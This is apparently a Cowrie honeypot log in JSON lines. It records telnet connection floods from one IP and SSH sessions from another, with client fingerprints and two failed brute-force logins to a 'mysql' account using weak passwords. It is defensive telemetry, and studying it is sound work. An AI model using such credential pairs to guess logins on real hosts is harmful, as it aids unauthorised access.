{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33126,"dst_ip":"1.2.3.4","dst_port":23,"session":"68d9b42d40cf","protocol":"telnet","message":"New connection: 60.22.179.111:33126 (1.2.3.4:23) [session: 68d9b42d40cf]","sensor":"my-vps","timestamp":"2025-08-24T23:38:13.500893Z"}
{"eventid":"cowrie.session.closed","duration":13.094233274459839,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:13.515317Z","src_ip":"60.22.179.111","session":"ccea22e47360"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33134,"dst_ip":"1.2.3.4","dst_port":23,"session":"044a41ba3640","protocol":"telnet","message":"New connection: 60.22.179.111:33134 (1.2.3.4:23) [session: 044a41ba3640]","sensor":"my-vps","timestamp":"2025-08-24T23:38:13.704102Z"}
{"eventid":"cowrie.session.closed","duration":13.767340898513794,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:16.496805Z","src_ip":"60.22.179.111","session":"8be32ed1a804"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33150,"dst_ip":"1.2.3.4","dst_port":23,"session":"63144713d4dd","protocol":"telnet","message":"New connection: 60.22.179.111:33150 (1.2.3.4:23) [session: 63144713d4dd]","sensor":"my-vps","timestamp":"2025-08-24T23:38:16.802341Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":40476,"dst_ip":"1.2.3.4","dst_port":22,"session":"397544e86a69","protocol":"ssh","message":"New connection: 196.251.115.108:40476 (1.2.3.4:22) [session: 397544e86a69]","sensor":"my-vps","timestamp":"2025-08-24T23:38:18.240833Z"}
{"eventid":"cowrie.session.closed","duration":13.85548710823059,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:18.492143Z","src_ip":"60.22.179.111","session":"ab9bce03dfb5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:38:18.588022Z","src_ip":"196.251.115.108","session":"397544e86a69"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:38:18.588706Z","src_ip":"196.251.115.108","session":"397544e86a69"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33164,"dst_ip":"1.2.3.4","dst_port":23,"session":"8d365fa5ffc2","protocol":"telnet","message":"New connection: 60.22.179.111:33164 (1.2.3.4:23) [session: 8d365fa5ffc2]","sensor":"my-vps","timestamp":"2025-08-24T23:38:18.640190Z"}
{"eventid":"cowrie.session.closed","duration":13.47412109375,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:21.294369Z","src_ip":"60.22.179.111","session":"10774fe58947"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33304,"dst_ip":"1.2.3.4","dst_port":23,"session":"be4b1f151f01","protocol":"telnet","message":"New connection: 60.22.179.111:33304 (1.2.3.4:23) [session: be4b1f151f01]","sensor":"my-vps","timestamp":"2025-08-24T23:38:21.469839Z"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456789","message":"login attempt [mysql/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T23:38:22.124398Z","src_ip":"196.251.115.108","session":"397544e86a69"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:23.337399Z","src_ip":"196.251.115.108","session":"397544e86a69"}
{"eventid":"cowrie.session.closed","duration":12.816564798355103,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:26.274393Z","src_ip":"60.22.179.111","session":"eac5906f0296"}
{"eventid":"cowrie.session.closed","duration":12.821613311767578,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:26.322325Z","src_ip":"60.22.179.111","session":"68d9b42d40cf"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33333,"dst_ip":"1.2.3.4","dst_port":23,"session":"98db4438001f","protocol":"telnet","message":"New connection: 60.22.179.111:33333 (1.2.3.4:23) [session: 98db4438001f]","sensor":"my-vps","timestamp":"2025-08-24T23:38:26.420631Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33332,"dst_ip":"1.2.3.4","dst_port":23,"session":"1e39ada64b9f","protocol":"telnet","message":"New connection: 60.22.179.111:33332 (1.2.3.4:23) [session: 1e39ada64b9f]","sensor":"my-vps","timestamp":"2025-08-24T23:38:26.451742Z"}
{"eventid":"cowrie.session.closed","duration":13.525002241134644,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:27.229010Z","src_ip":"60.22.179.111","session":"044a41ba3640"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33344,"dst_ip":"1.2.3.4","dst_port":23,"session":"5636bfc9d14f","protocol":"telnet","message":"New connection: 60.22.179.111:33344 (1.2.3.4:23) [session: 5636bfc9d14f]","sensor":"my-vps","timestamp":"2025-08-24T23:38:27.387309Z"}
{"eventid":"cowrie.session.closed","duration":13.389131307601929,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:30.191375Z","src_ip":"60.22.179.111","session":"63144713d4dd"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33381,"dst_ip":"1.2.3.4","dst_port":23,"session":"3e78f67dedeb","protocol":"telnet","message":"New connection: 60.22.179.111:33381 (1.2.3.4:23) [session: 3e78f67dedeb]","sensor":"my-vps","timestamp":"2025-08-24T23:38:30.340505Z"}
{"eventid":"cowrie.session.closed","duration":13.592646598815918,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:32.232770Z","src_ip":"60.22.179.111","session":"8d365fa5ffc2"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33492,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef026bd0a7e0","protocol":"telnet","message":"New connection: 60.22.179.111:33492 (1.2.3.4:23) [session: ef026bd0a7e0]","sensor":"my-vps","timestamp":"2025-08-24T23:38:32.398941Z"}
{"eventid":"cowrie.session.closed","duration":13.166403770446777,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:34.636179Z","src_ip":"60.22.179.111","session":"be4b1f151f01"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33511,"dst_ip":"1.2.3.4","dst_port":23,"session":"458214355f31","protocol":"telnet","message":"New connection: 60.22.179.111:33511 (1.2.3.4:23) [session: 458214355f31]","sensor":"my-vps","timestamp":"2025-08-24T23:38:34.808586Z"}
{"eventid":"cowrie.session.closed","duration":13.153618574142456,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:39.605298Z","src_ip":"60.22.179.111","session":"1e39ada64b9f"}
{"eventid":"cowrie.session.closed","duration":13.188446521759033,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:39.609003Z","src_ip":"60.22.179.111","session":"98db4438001f"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33553,"dst_ip":"1.2.3.4","dst_port":23,"session":"03ad4b97b0ca","protocol":"telnet","message":"New connection: 60.22.179.111:33553 (1.2.3.4:23) [session: 03ad4b97b0ca]","sensor":"my-vps","timestamp":"2025-08-24T23:38:39.771013Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33552,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e1f4c6b3b1a","protocol":"telnet","message":"New connection: 60.22.179.111:33552 (1.2.3.4:23) [session: 7e1f4c6b3b1a]","sensor":"my-vps","timestamp":"2025-08-24T23:38:39.786134Z"}
{"eventid":"cowrie.session.closed","duration":13.013041496276855,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:40.400271Z","src_ip":"60.22.179.111","session":"5636bfc9d14f"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33572,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0e5c464fdb9","protocol":"telnet","message":"New connection: 60.22.179.111:33572 (1.2.3.4:23) [session: b0e5c464fdb9]","sensor":"my-vps","timestamp":"2025-08-24T23:38:40.605501Z"}
{"eventid":"cowrie.session.closed","duration":13.054306268692017,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:43.394742Z","src_ip":"60.22.179.111","session":"3e78f67dedeb"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33687,"dst_ip":"1.2.3.4","dst_port":23,"session":"4246d6695117","protocol":"telnet","message":"New connection: 60.22.179.111:33687 (1.2.3.4:23) [session: 4246d6695117]","sensor":"my-vps","timestamp":"2025-08-24T23:38:43.586253Z"}
{"eventid":"cowrie.session.closed","duration":12.985972881317139,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:45.384816Z","src_ip":"60.22.179.111","session":"ef026bd0a7e0"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33698,"dst_ip":"1.2.3.4","dst_port":23,"session":"39bf5a39a54d","protocol":"telnet","message":"New connection: 60.22.179.111:33698 (1.2.3.4:23) [session: 39bf5a39a54d]","sensor":"my-vps","timestamp":"2025-08-24T23:38:45.608473Z"}
{"eventid":"cowrie.session.closed","duration":13.757238388061523,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:48.564809Z","src_ip":"60.22.179.111","session":"458214355f31"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33725,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca843c7c0e46","protocol":"telnet","message":"New connection: 60.22.179.111:33725 (1.2.3.4:23) [session: ca843c7c0e46]","sensor":"my-vps","timestamp":"2025-08-24T23:38:48.782685Z"}
{"eventid":"cowrie.session.closed","duration":13.602474451065063,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:53.388541Z","src_ip":"60.22.179.111","session":"7e1f4c6b3b1a"}
{"eventid":"cowrie.session.closed","duration":13.626734495162964,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:53.397673Z","src_ip":"60.22.179.111","session":"03ad4b97b0ca"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33878,"dst_ip":"1.2.3.4","dst_port":23,"session":"41722287ba9e","protocol":"telnet","message":"New connection: 60.22.179.111:33878 (1.2.3.4:23) [session: 41722287ba9e]","sensor":"my-vps","timestamp":"2025-08-24T23:38:53.670285Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33877,"dst_ip":"1.2.3.4","dst_port":23,"session":"baab4d9b69c3","protocol":"telnet","message":"New connection: 60.22.179.111:33877 (1.2.3.4:23) [session: baab4d9b69c3]","sensor":"my-vps","timestamp":"2025-08-24T23:38:53.674873Z"}
{"eventid":"cowrie.session.closed","duration":13.9437894821167,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:54.549217Z","src_ip":"60.22.179.111","session":"b0e5c464fdb9"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33889,"dst_ip":"1.2.3.4","dst_port":23,"session":"227e2ba0609d","protocol":"telnet","message":"New connection: 60.22.179.111:33889 (1.2.3.4:23) [session: 227e2ba0609d]","sensor":"my-vps","timestamp":"2025-08-24T23:38:54.738816Z"}
{"eventid":"cowrie.session.closed","duration":13.65815782546997,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:57.244343Z","src_ip":"60.22.179.111","session":"4246d6695117"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33898,"dst_ip":"1.2.3.4","dst_port":23,"session":"f28028d338c9","protocol":"telnet","message":"New connection: 60.22.179.111:33898 (1.2.3.4:23) [session: f28028d338c9]","sensor":"my-vps","timestamp":"2025-08-24T23:38:57.418981Z"}
{"eventid":"cowrie.session.closed","duration":13.773499965667725,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:59.381899Z","src_ip":"60.22.179.111","session":"39bf5a39a54d"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33912,"dst_ip":"1.2.3.4","dst_port":23,"session":"7b7737d45437","protocol":"telnet","message":"New connection: 60.22.179.111:33912 (1.2.3.4:23) [session: 7b7737d45437]","sensor":"my-vps","timestamp":"2025-08-24T23:38:59.541571Z"}
{"eventid":"cowrie.session.closed","duration":13.781193494796753,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:02.563774Z","src_ip":"60.22.179.111","session":"ca843c7c0e46"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33988,"dst_ip":"1.2.3.4","dst_port":23,"session":"c597b4927d68","protocol":"telnet","message":"New connection: 60.22.179.111:33988 (1.2.3.4:23) [session: c597b4927d68]","sensor":"my-vps","timestamp":"2025-08-24T23:39:02.724134Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":49250,"dst_ip":"1.2.3.4","dst_port":22,"session":"0646e5958f34","protocol":"ssh","message":"New connection: 196.251.115.108:49250 (1.2.3.4:22) [session: 0646e5958f34]","sensor":"my-vps","timestamp":"2025-08-24T23:39:06.627076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:39:06.918853Z","src_ip":"196.251.115.108","session":"0646e5958f34"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:39:06.919616Z","src_ip":"196.251.115.108","session":"0646e5958f34"}
{"eventid":"cowrie.session.closed","duration":13.687254428863525,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:07.362086Z","src_ip":"60.22.179.111","session":"baab4d9b69c3"}
{"eventid":"cowrie.session.closed","duration":13.693053007125854,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:07.363206Z","src_ip":"60.22.179.111","session":"41722287ba9e"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34086,"dst_ip":"1.2.3.4","dst_port":23,"session":"a43cfcbe7d9c","protocol":"telnet","message":"New connection: 60.22.179.111:34086 (1.2.3.4:23) [session: a43cfcbe7d9c]","sensor":"my-vps","timestamp":"2025-08-24T23:39:07.495023Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34087,"dst_ip":"1.2.3.4","dst_port":23,"session":"7fb1d2cf6365","protocol":"telnet","message":"New connection: 60.22.179.111:34087 (1.2.3.4:23) [session: 7fb1d2cf6365]","sensor":"my-vps","timestamp":"2025-08-24T23:39:07.621911Z"}
{"eventid":"cowrie.session.closed","duration":13.696619033813477,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:08.435362Z","src_ip":"60.22.179.111","session":"227e2ba0609d"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34101,"dst_ip":"1.2.3.4","dst_port":23,"session":"4eb8664251d3","protocol":"telnet","message":"New connection: 60.22.179.111:34101 (1.2.3.4:23) [session: 4eb8664251d3]","sensor":"my-vps","timestamp":"2025-08-24T23:39:08.654082Z"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"12345","message":"login attempt [mysql/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T23:39:09.835546Z","src_ip":"196.251.115.108","session":"0646e5958f34"}
{"eventid":"cowrie.session.closed","duration":12.915321826934814,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:10.334238Z","src_ip":"60.22.179.111","session":"f28028d338c9"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34109,"dst_ip":"1.2.3.4","dst_port":23,"session":"9527ed57f198","protocol":"telnet","message":"New connection: 60.22.179.111:34109 (1.2.3.4:23) [session: 9527ed57f198]","sensor":"my-vps","timestamp":"2025-08-24T23:39:10.550509Z"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:11.042444Z","src_ip":"196.251.115.108","session":"0646e5958f34"}
{"eventid":"cowrie.session.closed","duration":13.667509317398071,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:13.208990Z","src_ip":"60.22.179.111","session":"7b7737d45437"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34172,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0d3794aa71b","protocol":"telnet","message":"New connection: 60.22.179.111:34172 (1.2.3.4:23) [session: b0d3794aa71b]","sensor":"my-vps","timestamp":"2025-08-24T23:39:13.426344Z"}
{"eventid":"cowrie.session.closed","duration":13.568306922912598,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:16.292366Z","src_ip":"60.22.179.111","session":"c597b4927d68"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34270,"dst_ip":"1.2.3.4","dst_port":23,"session":"62669679b0c6","protocol":"telnet","message":"New connection: 60.22.179.111:34270 (1.2.3.4:23) [session: 62669679b0c6]","sensor":"my-vps","timestamp":"2025-08-24T23:39:16.506500Z"}
{"eventid":"cowrie.session.closed","duration":12.79596471786499,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:20.290910Z","src_ip":"60.22.179.111","session":"a43cfcbe7d9c"}
{"eventid":"cowrie.session.closed","duration":12.720120191574097,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:20.341969Z","src_ip":"60.22.179.111","session":"7fb1d2cf6365"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34297,"dst_ip":"1.2.3.4","dst_port":23,"session":"ecc35b32b7f9","protocol":"telnet","message":"New connection: 60.22.179.111:34297 (1.2.3.4:23) [session: ecc35b32b7f9]","sensor":"my-vps","timestamp":"2025-08-24T23:39:20.458948Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34296,"dst_ip":"1.2.3.4","dst_port":23,"session":"3158c4c0b653","protocol":"telnet","message":"New connection: 60.22.179.111:34296 (1.2.3.4:23) [session: 3158c4c0b653]","sensor":"my-vps","timestamp":"2025-08-24T23:39:20.601415Z"}
{"eventid":"cowrie.session.closed","duration":13.368643999099731,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:22.022706Z","src_ip":"60.22.179.111","session":"4eb8664251d3"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34309,"dst_ip":"1.2.3.4","dst_port":23,"session":"a2b54d869e70","protocol":"telnet","message":"New connection: 60.22.179.111:34309 (1.2.3.4:23) [session: a2b54d869e70]","sensor":"my-vps","timestamp":"2025-08-24T23:39:22.209355Z"}
{"eventid":"cowrie.session.closed","duration":12.50458812713623,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:23.055035Z","src_ip":"60.22.179.111","session":"9527ed57f198"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34320,"dst_ip":"1.2.3.4","dst_port":23,"session":"fcc03f1694e5","protocol":"telnet","message":"New connection: 60.22.179.111:34320 (1.2.3.4:23) [session: fcc03f1694e5]","sensor":"my-vps","timestamp":"2025-08-24T23:39:23.237803Z"}
{"eventid":"cowrie.session.closed","duration":12.759557008743286,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:26.185830Z","src_ip":"60.22.179.111","session":"b0d3794aa71b"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34455,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab945f9497e0","protocol":"telnet","message":"New connection: 60.22.179.111:34455 (1.2.3.4:23) [session: ab945f9497e0]","sensor":"my-vps","timestamp":"2025-08-24T23:39:26.327087Z"}
{"eventid":"cowrie.session.closed","duration":12.707165956497192,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:29.213602Z","src_ip":"60.22.179.111","session":"62669679b0c6"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34474,"dst_ip":"1.2.3.4","dst_port":23,"session":"c0e729e240ec","protocol":"telnet","message":"New connection: 60.22.179.111:34474 (1.2.3.4:23) [session: c0e729e240ec]","sensor":"my-vps","timestamp":"2025-08-24T23:39:29.393003Z"}
{"eventid":"cowrie.session.closed","duration":12.766063451766968,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:33.224939Z","src_ip":"60.22.179.111","session":"ecc35b32b7f9"}
{"eventid":"cowrie.session.closed","duration":12.670042991638184,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:33.271354Z","src_ip":"60.22.179.111","session":"3158c4c0b653"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34502,"dst_ip":"1.2.3.4","dst_port":23,"session":"60e1e8a848bb","protocol":"telnet","message":"New connection: 60.22.179.111:34502 (1.2.3.4:23) [session: 60e1e8a848bb]","sensor":"my-vps","timestamp":"2025-08-24T23:39:33.430395Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34503,"dst_ip":"1.2.3.4","dst_port":23,"session":"32031a6a977e","protocol":"telnet","message":"New connection: 60.22.179.111:34503 (1.2.3.4:23) [session: 32031a6a977e]","sensor":"my-vps","timestamp":"2025-08-24T23:39:33.480010Z"}
{"eventid":"cowrie.session.closed","duration":13.466389179229736,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:35.675677Z","src_ip":"60.22.179.111","session":"a2b54d869e70"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34629,"dst_ip":"1.2.3.4","dst_port":23,"session":"dbdd17961056","protocol":"telnet","message":"New connection: 60.22.179.111:34629 (1.2.3.4:23) [session: dbdd17961056]","sensor":"my-vps","timestamp":"2025-08-24T23:39:35.865364Z"}
{"eventid":"cowrie.session.closed","duration":13.105260610580444,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:36.342979Z","src_ip":"60.22.179.111","session":"fcc03f1694e5"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34640,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed8a3c5da8fc","protocol":"telnet","message":"New connection: 60.22.179.111:34640 (1.2.3.4:23) [session: ed8a3c5da8fc]","sensor":"my-vps","timestamp":"2025-08-24T23:39:36.499087Z"}
{"eventid":"cowrie.session.closed","duration":13.24211597442627,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:39.569122Z","src_ip":"60.22.179.111","session":"ab945f9497e0"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34665,"dst_ip":"1.2.3.4","dst_port":23,"session":"6f110b2acd93","protocol":"telnet","message":"New connection: 60.22.179.111:34665 (1.2.3.4:23) [session: 6f110b2acd93]","sensor":"my-vps","timestamp":"2025-08-24T23:39:39.832726Z"}
{"eventid":"cowrie.session.closed","duration":12.872043371200562,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:42.264949Z","src_ip":"60.22.179.111","session":"c0e729e240ec"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34687,"dst_ip":"1.2.3.4","dst_port":23,"session":"93b5362122c9","protocol":"telnet","message":"New connection: 60.22.179.111:34687 (1.2.3.4:23) [session: 93b5362122c9]","sensor":"my-vps","timestamp":"2025-08-24T23:39:42.410445Z"}
{"eventid":"cowrie.session.closed","duration":13.055123090744019,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:46.485425Z","src_ip":"60.22.179.111","session":"60e1e8a848bb"}
{"eventid":"cowrie.session.closed","duration":13.006485939025879,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:46.486401Z","src_ip":"60.22.179.111","session":"32031a6a977e"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34822,"dst_ip":"1.2.3.4","dst_port":23,"session":"b2d961a63b43","protocol":"telnet","message":"New connection: 60.22.179.111:34822 (1.2.3.4:23) [session: b2d961a63b43]","sensor":"my-vps","timestamp":"2025-08-24T23:39:46.623032Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34821,"dst_ip":"1.2.3.4","dst_port":23,"session":"6cd6617d4dc8","protocol":"telnet","message":"New connection: 60.22.179.111:34821 (1.2.3.4:23) [session: 6cd6617d4dc8]","sensor":"my-vps","timestamp":"2025-08-24T23:39:46.662494Z"}
{"eventid":"cowrie.session.closed","duration":13.473119258880615,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:49.338416Z","src_ip":"60.22.179.111","session":"dbdd17961056"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34846,"dst_ip":"1.2.3.4","dst_port":23,"session":"c92c20d1b141","protocol":"telnet","message":"New connection: 60.22.179.111:34846 (1.2.3.4:23) [session: c92c20d1b141]","sensor":"my-vps","timestamp":"2025-08-24T23:39:49.530698Z"}
{"eventid":"cowrie.session.closed","duration":13.933480739593506,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:50.432481Z","src_ip":"60.22.179.111","session":"ed8a3c5da8fc"}
